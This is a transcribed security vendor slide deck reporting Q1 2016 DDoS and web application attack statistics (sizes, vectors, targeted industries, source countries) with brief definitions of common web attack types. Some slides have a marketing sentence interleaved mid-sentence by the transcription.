DDoS attack patterns across the APJ cloud market. Samuel Chen CCIE#9607 Enterprise Security Architect, Manager - APJ

Similar documents
The Presence and Future of Web Attacks

State of the Internet Security Q Mihnea-Costin Grigore Security Technical Project Manager

akamai s [state of the internet] / security

War Stories from the Cloud: Rise of the Machines. Matt Mosher Director Security Sales Strategy

VERISIGN DISTRIBUTED DENIAL OF SERVICE TRENDS REPORT

VERISIGN DISTRIBUTED DENIAL OF SERVICE TRENDS REPORT

Prolexic Attack Report Q4 2011

snoc Snoc DDoS Protection Fast Secure Cost effective Introduction Snoc 3.0 Global Scrubbing Centers Web Application DNS Protection

2nd SIG-NOC meeting and DDoS Mitigation Workshop Scrubbing Away DDOS Attacks. 9 th November 2015

Cybersecurity. Anna Chan, Marketing Director, Akamai Technologies

VERISIGN DISTRIBUTED DENIAL OF SERVICE TRENDS REPORT

Global DDoS Threat Landscape

WEB DDOS PROTECTION APPLICATION PROTECTION VIA DNS FORWARDING

SOTI SUMMER [state of the internet] / security ATTACK SPOTLIGHT

An Introduction to DDoS attacks trends and protection Alessandro Bulletti Consulting Engineer, Arbor Networks

VERISIGN DISTRIBUTED DENIAL OF SERVICE TRENDS REPORT

VERISIGN DISTRIBUTED DENIAL OF SERVICE TRENDS REPORT

The Interactive Guide to Protecting Your Election Website

haltdos - Web Application Firewall

WHITE PAPER. DDoS of Things SURVIVAL GUIDE. Proven DDoS Defense in the New Era of 1 Tbps Attacks

Secure your Web Applications with AWS WAF & AWS Shield. James Chiang ( 蔣宗恩 ) AWS Solution Architect

Cloudflare Advanced DDoS Protection

( ) 2016 NSFOCUS

IoT - Next Wave of DDoS? IoT Sourced DDoS Attacks A Focus on Mirai Botnet and Best Practices in DDoS Defense

VERISIGN DISTRIBUTED DENIAL OF SERVICE TRENDS REPORT

Intelligent and Secure Network

INTRODUCTION: DDOS ATTACKS GLOBAL THREAT INTELLIGENCE REPORT 2015 :: COPYRIGHT 2015 NTT INNOVATION INSTITUTE 1 LLC

Why IPS Devices and Firewalls Fail to Stop DDoS Threats

Evidence-based protection of web resources a must under the GDPR. How the Akamai Intelligent Platform helps customers to mitigate risks

DNS Authentication-as-a-Service Preventing Amplification Attacks

A custom excerpt from Frost & Sullivan s Global DDoS Mitigation Market Research Report (NDD2-72) July, 2014 NDD2-74

(DNS, and DNSSEC and DDOS) Geoff Huston APNIC

Vulnerability Management & Vulnerability Assessment. Nessus Attack Scripting Language (NASL). CVE databases, NVD database

Distributed Denial of Service (DDoS)

DDOS-GUARD Q DDoS Attack Report

DDOS DETECTION AND RESPONSE TRENDS IN THE ENTERPRISE: AN IANS CUSTOM REPORT

Distributed Denial of Service (DDoS)

SYMANTEC ENTERPRISE SECURITY. Symantec Internet Security Threat Report September 2005 Power and Energy Industry Data Sheet

DoS Cyber Attack on a Government Agency in Europe- April 2012 Constantly Changing Attack Vectors

Perimeter Defenses T R U E N E T W O R K S E C U R I T Y DEPENDS ON MORE THAN

Introduction to DDoS Attacks

Comprehensive datacenter protection

Radware s Attack Mitigation Solution Protect Online Businesses and Data Centers Against Emerging Application & Network Threats - Whitepaper

Arbor WISR XII The Stakes Have Changed. Julio Arruda V1.0

Multi-vector DDOS Attacks

AKAMAI SOLUTION BROCHURE CLOUD SECURITY SOLUTIONS FAST RELIABLE SECURE.

Cyber War Chronicles Stories from the Virtual Trenches

THE STATE OF MEDIA SECURITY HOW MEDIA COMPANIES ARE SECURING THEIR ONLINE PROPERTIES

Check Point DDoS Protector Introduction

This ethical hacking course puts you in the driver's seat of a hands-on environment with a systematic process.

SOLUTION BRIEF. Enabling and Securing Digital Business in API Economy. Protect APIs Serving Business Critical Applications

A10 DDOS PROTECTION CLOUD

PROTECTING INFORMATION ASSETS NETWORK SECURITY

Advanced Techniques for DDoS Mitigation and Web Application Defense

AKAMAI CLOUD SECURITY SOLUTIONS

War Stories from the Cloud Going Behind the Web Security Headlines. Emmanuel Mace Security Expert

Exit from Hell? Reducing the Impact of Amplification DDoS Attacks Marc Kührer, Thomas Hupperich, Christian Rossow, and Thorsten Holz

Technical White Paper June 2016

Additional Security Services on AWS

2015 DDoS Attack Trends and 2016 Outlook

Corrigendum 3. Tender Number: 10/ dated

Analisi degli attacchi DDOS e delle contromisure

sottotitolo System Security Introduction Milano, XX mese 20XX A.A. 2016/17 Federico Reghenzani

Routing Security DDoS and Route Hijacks. Merike Kaeo CEO, Double Shot Security

Imma Chargin Mah Lazer

ACS / Computer Security And Privacy. Fall 2018 Mid-Term Review

Enterprise Overview. Benefits and features of Cloudflare s Enterprise plan FLARE

F5 comprehensive protection against application attacks. Jakub Sumpich Territory Manager Eastern Europe

Radware Attack Mitigation Solution (AMS) Protect Online Businesses and Data Centers Against Emerging Application & Network Threats - Whitepaper

epldt Web Builder Security March 2017

DNS Security. Ch 1: The Importance of DNS Security. Updated

Enhancing DDoS protection TAYLOR HARRIS SECURITY ENGINEER

Question No: 2 Which identifier is used to describe the application or process that submitted a log message?

Ethical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities

ddos-guard.net Protecting your business DDoS-GUARD: Distributed protection against distributed attacks

TOP TEN DNS ATTACKS PROTECTING YOUR ORGANIZATION AGAINST TODAY S FAST-GROWING THREATS

A Security Orchestration System for CDN Edge Servers

Cyber Security & Ethical Hacking Training. Introduction to Cyber Security Introduction to Cyber Security. Linux Operating System and Networking: LINUX

Global DDoS Threat Landscape

DoS Cyber Attack on a Government Agency in South America- February 2012 Anonymous Mobile LOIC in Action

Anti-DDoS. FAQs. Issue 11 Date HUAWEI TECHNOLOGIES CO., LTD.

INF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015

McAfee Labs Threat Report

Chapter 7. Denial of Service Attacks

DDoS: STRATEGIES FOR DEALING WITH A GROWING THREAT

Sam Pickles, F5 Networks A DAY IN THE LIFE OF A WAF

AKAMAI THREAT ADVISORY. Satori Mirai Variant Alert

DDoS Detection&Mitigation: Radware Solution

August 14th, 2018 PRESENTED BY:

PracticeDump. Free Practice Dumps - Unlimited Free Access of practice exam

TESTING DDOS DEFENSE EFFECTIVENESS AT 300 GBPS SCALE AND BEYOND

Stratum Filtering for DDoS Resilient Clouds

Encrypted Traffic Security (ETS) White Paper

Memcached amplification: lessons learned. Artyom Gavrichenkov

CLOUD-BASED DDOS PROTECTION FOR HOSTING PROVIDERS

(Distributed) Denial-of-Service. in theory and in practice

Guide to DDoS Attacks November 2017

ADVANCED THREAT PREVENTION FOR ENDPOINT DEVICES 5 th GENERATION OF CYBER SECURITY

Memcached amplification: lessons learned. Artyom Gavrichenkov

Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition. Chapter 3 Investigating Web Attacks

Transcription:

DDoS attack patterns across the APJ cloud market Samuel Chen CCIE#9607 Enterprise Security Architect, Manager - APJ www.cloudsec.com/tw

DDoS attacks from Q1 2014 to Q1 2016 Each dot represents an individual DDoS attack, and each interval covers a 10-fold increase in attack size. The boxes mark the interquartile range the middle 50% of attacks.

DDoS Attack Median Packet Rate and IQR While there were six DDoS attacks in Q1 that exceeded 30 Mpps, more than half of the attacks measured 1 Mpps or less. The graph shows the packet rate for the middle 50% of DDoS attacks from Q1 2014 Q1 2016

Compared to Q1 2015 125% Total DDoS attacks 142% Infrastructure layer attacks 35% Average attack duration 138% Total attacks > 100 Gbps In Q1 2016, repeat DDoS attacks remained the norm, with an average of 29 attacks per targeted customer. One target suffered 283 attacks an average of three times per day for the quarter.

Compared to Q4 2015 23% Total DDoS attacks 107% Repeat attacks per target 23% Infrastructure layer attacks 8% Average attack duration 280% Total attacks >100 Gbps Largest attack: 289 Gbps Most packets per second: 67 Mpps In Q1 2016, stresser/booter-based botnets remained the source of the vast majority of DDoS attacks observed by Akamai. These tools rely heavily upon reflection techniques to fuel their traffic.

Types of DDoS Attacks & Relative Distribution in Q1 2016 UDP Fragment, DNS, NTP and CHARGEN attack vectors made up almost 70% of the attacks.

10 Most Frequent Attack Vectors by Quarter TCP Anomaly attacks remain in the top 10 vectors, which first edged out ICMP attacks in Q4 2015. Avoid data theft and downtime by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks.

Multi-Vector DDoS Attacks Are the Norm Multi-vector Avoid data theft and downtime by extending attacks the accounted security perimeter outside the data-center and for 59% of DDoS protect from increasing frequency, scale and activity sophistication in Q1 2016, of web attacks. up from 56% in Q4 2015

Reflection-Based DDoS Attacks, Q1 2015-Q1 2016 Avoid data theft and downtime by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks. SSDP, NTP, DNS, and CHARGEN have consistently been used as the most common reflection attack vectors, as shown on the left axis. The use of reflection attacks has increased dramatically since Q1 2015, as shown on the right axis.

DDoS Attack Frequency by Industry Avoid data theft and downtime by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks.

Average Number of DDoS Attacks per Target In Q1 2016 there were an average of 29 DDoS Avoid data theft and downtime by extending the security perimeter outside attacks the data-center per target, and up protect from increasing frequency, scale and sophistication of web attacks. from 24 last quarter. One target was hit with 283 attacks averaging more than 3 attacks per day.

Top 10 Source Countries for DDoS Attacks in Q1 2016 China was the top source of non- Avoid data theft and downtime by extending the security perimeter outside the data-center spoofed DDoS and attacks protect from increasing frequency, in the scale first and quarter, sophistication of web attacks. followed by the US.

Top 5 Source Countries for DDoS Attacks, Q1 2015 Q1 2016 Avoid data theft and downtime by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks. China has been the top source country for DDoS attacks since Q1 2015, with the exception of Q3 2015, when the UK took the top spot.

Mega Attacks > 100 Gbps in Q1 2016 Nineteen attacks exceeded 100 Gbps in Q1 2016, with the largest hitting the software and technology, gaming and media-entertainment Avoid data theft and downtime sectors. by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks.

Mega Attacks > 30 Mpps in Q1 2016 Of the six attacks exceeding 30 Mpps in Avoid data theft and downtime by extending Q1 the 2016, the four security perimeter outside the data-center and largest targeted the protect from increasing frequency, scale and software sophistication and of web attacks. technology sector.

Spotlight: Attack traffic distribution Avoid data theft and downtime within by scrubbing extending center the locations, highlighted with security perimeter outside the data-center and Frankfurt absorbing the protect from increasing frequency, scale and sophistication of web attacks. highest peak bandwidth of 104 Gbps.

Web Application Attack Analysis

9 Common Web Attack Vectors SQLi / SQL injection: User content is passed to an SQL statement without proper validation LFI / Local file inclusion: Gains unauthorized read access to local files on the web server RFI / Remote file inclusion: Abuse of the dynamic file include mechanism available in many programming languages to load remote malicious code into the victim web application PHPi / PHP injection: Injects PHP code that gets executed by the PHP interpreter CMDi / Command injection: Executes arbitrary shell commands on the target system JAVAi / Java injection: Abuses the Object Graph Navigation Language (OGNL), a Java expression language. Popular due to recent flaws in the Java-based Struts Framework, which uses OGNL extensively MFU / Malicious file upload (or unrestricted file upload): Uploads unauthorized files to the target application that may be used later to gain full control over the system XSS / Cross-site scripting: Injects client-side code into web pages viewed by others whose browsers execute the code within the security context (or zone) of the hosting web site. Reads, modifies and/or transmits data accessible by the browser Shellshock / Disclosed in September 2014: A vulnerability in the Bash shell (the default shell for Linux and mac OS X) that allows for arbitrary command execution by a remote attacker

Web Application Attack Vectors Over HTTP, Q1 2016 SQLi, LFI and XSS were the most prevalent attack vectors. They were used in more than 90% of the attacks over HTTP.

Attacks Over HTTPS, Q1 2016 30% of the web application attacks observed in Q1 2016 were over encrypted (HTTPS) connections, an increase from only 11% the previous quarter.

Top 10 Source Countries for Web Application Attacks, Q1 2016

Top 10 Target Countries for Web Application Attacks, Q1 2016 US-hosted web sites were targeted six times more often than the second most popular target country, Brazil.

Web Application Attacks by Industry, Q1 2016 As in previous quarters, the retail industry was most frequently targeted with web application attacks in Q1 2016.

Web Application Attack Triggers by Industry, Q1 2016 94% of the attack triggers for web application attacks in Q1 2016 targeted just eight industries (shown in black).

SQLi and LFI Attack Triggers by Target Industry, Q1 2016

Shellshock, XSS, and MFU Attack Triggers by Industry

CMDI, PHPI, and RFI Attack Triggers by Industry

24 Hour Bot Traffic Snapshot

Akamai Intelligent Platform Firewall Activity

Reflector Activity The location of leveraged Internet devices used in reflection-based DDoS attacks during Q1 2016 was concentrated in the US, Asia, and Europe.

Top 10 Reflection Sources by ASN

DDoS Reflection Sources

Cloud Security Resources

Q1 2016 Cloud Security Resources Scraper and Bot Series When Good Bots Go Bad #OpKillingBay Expands Attacks BillGates Malware Used in DDoS Attacks Akamai Responds to Forwarding-Loop Issue IKE/IKEv2 Ripe for DDoS Abuse Akamai and the Glibc Vulnerability (CVE-2015-7547) Akamai and the DROWN Vulnerability DNSSEC Targeted in DNS Reflection, Amplification DDoS Attacks Akamai Customers Not Vulnerable to SLOTH How Web Applications Become SEO Pawns

Samuel Chen CCIE#9607 Enterprise Security Architect, Manager - APJ

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback